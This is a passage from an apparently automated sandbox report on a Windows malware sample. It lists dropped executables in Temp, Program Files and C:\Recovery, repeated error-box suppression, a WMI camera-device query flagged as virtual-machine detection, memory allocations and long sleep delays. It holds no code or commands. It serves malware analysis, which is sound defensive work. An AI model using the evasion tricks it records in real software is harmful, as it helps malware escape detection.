Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Memory allocated: 1340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Memory allocated: 4CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Memory allocated: 1AF20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Memory allocated: 8D0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Memory allocated: 1A360000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Memory allocated: 950000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Memory allocated: 1A700000 memory reserve \| memory write watch
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Memory allocated: 1500000 memory reserve \| memory write watch
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Memory allocated: 1050000 memory reserve \| memory write watch
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Memory allocated: 1ABC0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599875
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599766
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599656
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599547
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599437
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599328
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599218
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599109
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598999
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598890
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598781
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598672
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598510
